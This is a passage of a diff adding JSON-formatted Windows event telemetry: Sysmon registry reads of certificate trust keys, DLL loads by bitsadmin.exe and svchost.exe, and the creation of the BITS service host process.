2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software 
Publishing", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "c:\\windows\\system32\\svchost.exe -k netsvcs -p -s BITS", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 3980, + "ppid": 568, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "create", + "timestamp": 131883570876860016, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}", + "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876830000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 
+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
"C:\\Windows\\System32\\kernel32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 3980, + 
"process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": 
"C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 
